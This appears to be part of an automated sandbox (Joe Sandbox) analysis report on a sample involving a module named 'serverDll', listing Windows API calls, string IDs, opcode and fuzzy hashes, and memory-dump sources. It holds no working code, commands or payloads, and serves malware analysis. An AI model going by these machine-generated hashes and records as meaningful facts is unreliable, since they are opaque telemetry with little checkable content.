                                                                                            • API ID: CapsDevice$Release
                                                                                            • String ID:
                                                                                            • API String ID: 1035833867-0
                                                                                            • Opcode ID: 7713e6303daca65237eb9db5f792d93aade65603b6c377ba856265e2bc14db21
                                                                                            • Instruction ID: ea5e1fe6d66ea4fc36bf8c5f316dcf17910b79abbd4549be3e86987ca944ba21
                                                                                            • Opcode Fuzzy Hash: 7713e6303daca65237eb9db5f792d93aade65603b6c377ba856265e2bc14db21
                                                                                            • Instruction Fuzzy Hash: 03E01D36A92731B7D751DBE47C0DB8F3E78AB15B52F014102F605A51D0DF7845428B91
                                                                                            APIs
                                                                                              • Part of subcall function 00A4A699: GetDC.USER32(00000000), ref: 00A4A69D
                                                                                              • Part of subcall function 00A4A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4A6A8
                                                                                              • Part of subcall function 00A4A699: ReleaseDC.USER32(00000000,00000000), ref: 00A4A6B3
                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00A4A83C
                                                                                              • Part of subcall function 00A4AAC9: GetDC.USER32(00000000), ref: 00A4AAD2
                                                                                              • Part of subcall function 00A4AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00A4AB01
                                                                                              • Part of subcall function 00A4AAC9: ReleaseDC.USER32(00000000,?), ref: 00A4AB99
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                            • String ID: (
                                                                                            • API String ID: 1061551593-3887548279
                                                                                            • Opcode ID: 439fb5433146d2429ae65336723ef9783c183e348f9961d4e1ff844cccc7cd7b
                                                                                            • Instruction ID: 1a38d40b0b4776d1628407d38ca4ceeb9ed4b7ed94803db6c1c10b1116aaddff
                                                                                            • Opcode Fuzzy Hash: 439fb5433146d2429ae65336723ef9783c183e348f9961d4e1ff844cccc7cd7b
                                                                                            • Instruction Fuzzy Hash: 9A91E0B5608354AFDA11DF65C854A6BBBF8FFD8700F00491EF59AD3260DB70A906CB62
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A375E3
                                                                                              • Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0
                                                                                              • Part of subcall function 00A3A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598
                                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A3777F
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                            • String ID: :
                                                                                            • API String ID: 3226429890-336475711
                                                                                            • Opcode ID: 6c815442fef50947b6e459777b2a9ba6d6786e1005daeef7d995fc2ac9913588
                                                                                            • Instruction ID: d52c4a3cc45da84674db12192ff21fd50a13c1c95f509cff9b7d7e5e35da05b0
                                                                                            • Opcode Fuzzy Hash: 6c815442fef50947b6e459777b2a9ba6d6786e1005daeef7d995fc2ac9913588
                                                                                            • Instruction Fuzzy Hash: AD4161B1805158AAEB35EB64CD56EEEB37CEF55300F008096B649A2092DB745F89CF61
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: }
                                                                                            • API String ID: 176396367-4239843852
                                                                                            • Opcode ID: 5fff244215bb0250d572cca17bf2e53e77aae3f368b738885c457160ce608fe2
                                                                                            • Instruction ID: d4512ac8e0456a6a1e129f6758bfe1ac8b9b99e3bb4f5e81b1204fd52d729c63
                                                                                            • Opcode Fuzzy Hash: 5fff244215bb0250d572cca17bf2e53e77aae3f368b738885c457160ce608fe2
                                                                                            • Instruction Fuzzy Hash: 5121DE7692430A5ADB31EB68D945A6AB3ECEFD0751F04042AFA41C3141EB75ED4883B3
                                                                                            APIs
                                                                                              • Part of subcall function 00A3F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A3F2E4
                                                                                              • Part of subcall function 00A3F2C5: GetProcAddress.KERNEL32(00A781C8,CryptUnprotectMemory), ref: 00A3F2F4
                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00A3F33E), ref: 00A3F3D2
                                                                                            Strings
                                                                                            • CryptProtectMemory failed, xrefs: 00A3F389
                                                                                            • CryptUnprotectMemory failed, xrefs: 00A3F3CA
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CurrentProcess
                                                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                            • API String ID: 2190909847-396321323
                                                                                            APIs
                                                                                            • _swprintf.LIBCMT ref: 00A3B9B8
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: __vswprintf_c_l_swprintf
                                                                                            • String ID: %c:\
                                                                                            • API String ID: 1543624204-3142399695
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00010000,00A41160,?,00000000,00000000), ref: 00A41043
                                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00A4108A
                                                                                              • Part of subcall function 00A36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A36C54
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                            • String ID: CreateThread failed
                                                                                            • API String ID: 2655393344-3849766595
                                                                                            APIs
                                                                                              • Part of subcall function 00A3E2E8: _swprintf.LIBCMT ref: 00A3E30E
                                                                                              • Part of subcall function 00A3E2E8: _strlen.LIBCMT ref: 00A3E32F
                                                                                              • Part of subcall function 00A3E2E8: SetDlgItemTextW.USER32(?,00A6E274,?), ref: 00A3E38F
                                                                                              • Part of subcall function 00A3E2E8: GetWindowRect.USER32(?,?), ref: 00A3E3C9
                                                                                              • Part of subcall function 00A3E2E8: GetClientRect.USER32(?,?), ref: 00A3E3D5
                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                            • SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                            • String ID: 0
                                                                                            • API String ID: 2622349952-4108050209
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00A41206,?), ref: 00A40FEA
                                                                                            • GetLastError.KERNEL32(?), ref: 00A40FF6
                                                                                              • Part of subcall function 00A36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A36C54
                                                                                            Strings
                                                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A40FFF
                                                                                            Similarity
                                                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                            • API String ID: 1091760877-2248577382
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00A3DA55,?), ref: 00A3E2A3
                                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A3DA55,?), ref: 00A3E2B1
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: FindHandleModuleResource
                                                                                            • String ID: RTL
                                                                                            • API String ID: 3537982541-834975271
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5[_H
                                                                                            • API String ID: 0-3279724263
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76ac3db1609942383cf9a0a454338107c70ddbf1dac6dbe6e63f5c10add1ec6b
                                                                                            • Instruction ID: 68db304ad41363c2825164b67cc2a99fcda8154b7e80ba058d8acef12a3f2a47
                                                                                            • Opcode Fuzzy Hash: 76ac3db1609942383cf9a0a454338107c70ddbf1dac6dbe6e63f5c10add1ec6b
                                                                                            • Instruction Fuzzy Hash: 8C31733160D9498FDF98EF1CC465EA573E2FFA8315B0542AED04AC72A2DE25F845CB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4c87f2f2fc623ed7c462f3e85bb2a829701006bc428143512964ab659bc5aef8
                                                                                            • Instruction ID: c90bbe41bc4dc76f32083540b1231602076186bcb733799735abbcc37003b9e2
                                                                                            • Opcode Fuzzy Hash: 4c87f2f2fc623ed7c462f3e85bb2a829701006bc428143512964ab659bc5aef8
                                                                                            • Instruction Fuzzy Hash: EE316A30A1E55E4AE778C69884B86F877A5FF62304F1586BEC04EC71A7CD3D7A818741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5c51c40e4e8ba6a5f1f4157ca5fd80e71ee939547726c79cfafafc9aa677637
                                                                                            • Instruction ID: f633d06ebf4bba6854a2f3ed4b006ede1693f13cdad2142664445fbe11ca5448
                                                                                            • Opcode Fuzzy Hash: c5c51c40e4e8ba6a5f1f4157ca5fd80e71ee939547726c79cfafafc9aa677637
                                                                                            • Instruction Fuzzy Hash: DC119B32B0E74E4FEB759AA048685B83BE4DF16350F0601B6D409EB1B2DA652D448390
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8bec3ed0d12e8589e31241cbaa3fc4a4b3d31686a814662a0a906e3e51b9d98e
                                                                                            • Instruction ID: 69b8d36043099ad96aa5ff0213456cd5fe77b1063c370dcb50210338781528a4
                                                                                            • Opcode Fuzzy Hash: 8bec3ed0d12e8589e31241cbaa3fc4a4b3d31686a814662a0a906e3e51b9d98e
                                                                                            • Instruction Fuzzy Hash: 9F112221F0AD0ECFEBA8AA6484628F937D4EF64354B00063AD41EC74E2CE29B6408390
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f4129265a5bdaef16ea39ecbce1cb4220846f5b6d13c7304457a068a807b3be
                                                                                            • Instruction ID: ead894d5eef1f33b5f89c80b46d78ee88b5230e0c8baa6f666089cca0b7c216b
                                                                                            • Opcode Fuzzy Hash: 9f4129265a5bdaef16ea39ecbce1cb4220846f5b6d13c7304457a068a807b3be
                                                                                            • Instruction Fuzzy Hash: AB117331B0961C8FE798DB58D8AA6B8B3E1FF59315F01017AD04ED76B6CA216D418B41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d3e63f17ff0d92da1d8584649b129cd9158cf69b5274c1ce6b5f85efc9a29971
                                                                                            • Instruction ID: 85e9f547bc4b9bce495e3f5ef95b8c9b2a9c9c327d24f3332c44846cf0a15e7d
                                                                                            • Opcode Fuzzy Hash: d3e63f17ff0d92da1d8584649b129cd9158cf69b5274c1ce6b5f85efc9a29971
                                                                                            • Instruction Fuzzy Hash: 68110431F0AA0E8FEB79AA6494355F973D0FF58359F00067AD04EC75E2DE29B6448391
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f5bf3d50223fb488f9498f1e6b631518e430060231bb01c4dff6fa99bb1282be
                                                                                            • Instruction ID: db1948a65041e14fa2c5199c3773b75792d422cfbe2cf13c24d6e343143a2da6
                                                                                            • Opcode Fuzzy Hash: f5bf3d50223fb488f9498f1e6b631518e430060231bb01c4dff6fa99bb1282be
                                                                                            • Instruction Fuzzy Hash: 8A115C3170650BCFE72A9A58D4353F83394EF55355F11013AD50DC72F1DE25A6808781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db327c142e47979b87c48dbd6c46fd4fb67495505b170efb0d583d3a4dc7328b
                                                                                            • Instruction ID: 5b4000e60ac77d7a55d0a6e3b4358ef08ea8c1c7bd88bb2fdf9bb953cbe41864
                                                                                            • Opcode Fuzzy Hash: db327c142e47979b87c48dbd6c46fd4fb67495505b170efb0d583d3a4dc7328b
                                                                                            • Instruction Fuzzy Hash: 1F118C32B0A50FCFE7699A68D47A2F43394EF61350F11013AD51EC72F1DF26A6808780
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c67bbe93f1276730c93cb4612eeb0ec9e089878ba030e623d74d329d0a80a05
                                                                                            • Instruction ID: ab422ad5c5ad2a45b4a534a3fc44b579dca9053b34c4b975fc25a801d1ea31e0
                                                                                            • Opcode Fuzzy Hash: 7c67bbe93f1276730c93cb4612eeb0ec9e089878ba030e623d74d329d0a80a05
                                                                                            • Instruction Fuzzy Hash: 4711FC35A1951D9FDB9CDB58C865AACB7A1FF58315F0101BED04EE36A1CE35A9808B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 135c17de52fcf1606593ca252cc97ae78d940a0ac093202ed2b4629ca0fdf180
                                                                                            • Instruction ID: b6d89a09d6a5aeba53f91ea10209c711494a2405517c851d5de40354f07fce10
                                                                                            • Opcode Fuzzy Hash: 135c17de52fcf1606593ca252cc97ae78d940a0ac093202ed2b4629ca0fdf180
                                                                                            • Instruction Fuzzy Hash: AA11C236B0E64D8FE721DFA888A01DC7BB1EF42711F1645B7D088DB1A2D578264A87A4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b3d64a8182a1650759f3f3e82b750c82ddbfeed85ded4574187fc734cd4a01c
                                                                                            • Instruction ID: 069553a1002363997a845627341f8710d30bf32c3944074f4bf8569c6359acaa
                                                                                            • Opcode Fuzzy Hash: 1b3d64a8182a1650759f3f3e82b750c82ddbfeed85ded4574187fc734cd4a01c
                                                                                            • Instruction Fuzzy Hash: FF01C436A0E28D8FE721DFA8C4A01DC7FB1EF42711F1645B7D048DB1A2D57466498764
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e81f3f73167197c833f30f0adf7baf1b9dc96dcbda3c5984a3a0f58aafe3673
                                                                                            • Instruction ID: 1654053b3f8b70393f702dfc3adbe18f44a1535e92ec2e3dada1f9293d2ad5e5
                                                                                            • Opcode Fuzzy Hash: 5e81f3f73167197c833f30f0adf7baf1b9dc96dcbda3c5984a3a0f58aafe3673
                                                                                            • Instruction Fuzzy Hash: EC019E36A0E28D9FE721DFA8C8901DCBFB1EF02710F1641E7D048DB2A2D9786A45C790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9b3adb42081e18a4d7aa78fc54e7c6325f2b1f7983621b88fb98308c8d9ffab
                                                                                            • Instruction ID: c7b64d9593c5cbe7583d4c1aa2670713306fa48985d499f6a4476a31bb38acf0
                                                                                            • Opcode Fuzzy Hash: c9b3adb42081e18a4d7aa78fc54e7c6325f2b1f7983621b88fb98308c8d9ffab
                                                                                            • Instruction Fuzzy Hash: 27017C35A0E28D9FEB21DBA488A01DCBFB1AF02704F1541E7D048DB2A2D9786A458754
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: add277d8bf0cab0eb4fc4b29164cc17323cb0ebd161d1b71092f61503b5df974
                                                                                            • Instruction ID: 6e23705e03e36540422fb76450c178355cac47db8e2e5927c0bce5c508095829
                                                                                            • Opcode Fuzzy Hash: add277d8bf0cab0eb4fc4b29164cc17323cb0ebd161d1b71092f61503b5df974
                                                                                            • Instruction Fuzzy Hash: E9F0963554F3C9DFD722CBB088255E93FB8AF57214B1A01F6D455CB0B2C92E5606C761
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb97fa63cc02019615bce3a9726a9d001d9520f00d6ce2135088421caf30a2b0
                                                                                            • Instruction ID: 3403dd0e04a2e5571384252f179eed7f502e29f9eadec8e214f7ce25377a5501
                                                                                            • Opcode Fuzzy Hash: bb97fa63cc02019615bce3a9726a9d001d9520f00d6ce2135088421caf30a2b0
                                                                                            • Instruction Fuzzy Hash: 6C013C31A08919CFCB58EB18C890FA9B3F1FBA8301F00019ED44EE3261DA30AE40CF80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a29d3aa9ee067f7f11d92f2d8b3db11192869e273f91d1fadcb64056943982a
                                                                                            • Instruction ID: 1cb46c7cbbd4ea7831ba37085f71d5ea975e002a8c998d209813b43268370c44
                                                                                            • Opcode Fuzzy Hash: 9a29d3aa9ee067f7f11d92f2d8b3db11192869e273f91d1fadcb64056943982a
                                                                                            • Instruction Fuzzy Hash: D3F0E53925D649CFC741DB7DC8A44C5BBA0FF07224B5505EAD088CB5A2D321686DCB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b7fc5e9b8062b6f5b2af62229ce35b36b4fd37eca7fa5fe5dc5e914d2a5465fe
                                                                                            • Instruction ID: ca00bebd1b72c82714c2d0e16c9ab24099f7726c0ff85caf87081f5e7fa53abf
                                                                                            • Opcode Fuzzy Hash: b7fc5e9b8062b6f5b2af62229ce35b36b4fd37eca7fa5fe5dc5e914d2a5465fe
                                                                                            • Instruction Fuzzy Hash: 36F09621A4E2CA8FDB325BB44CA10E83FA49F1731070E15F5C4848B1E3D5696615D755
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8822fcc8dccf8914e27af8fc25bd168da6496297983b77c399740d0aeca1ac58
                                                                                            • Instruction ID: c5f801abec38a56205aedb7fbfbb96438b3d646013adba4def9a026b1e10e60c
                                                                                            • Opcode Fuzzy Hash: 8822fcc8dccf8914e27af8fc25bd168da6496297983b77c399740d0aeca1ac58
                                                                                            • Instruction Fuzzy Hash: 48F0C221A0E3DA8FDB228BB48CE50A43BA0DF1731031A06FAC0848B0E7D5697D15C311
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54fa35b74f3376c17a29fee60933b240d460411f006790f997afb949e8d7f05c
                                                                                            • Instruction ID: 7bb012473c08daed9430c206e709cfbd788435ba4eb502b70741290e88925471
                                                                                            • Opcode Fuzzy Hash: 54fa35b74f3376c17a29fee60933b240d460411f006790f997afb949e8d7f05c
                                                                                            • Instruction Fuzzy Hash: 54E01274F0911E46F7B8A344D8A13E96262EB95700F1540B8DA1ED33E1DD78AF418A6A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2955154057.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9be60000_serverDll.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2526364674.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffd9baa0000_serverDll.jbxd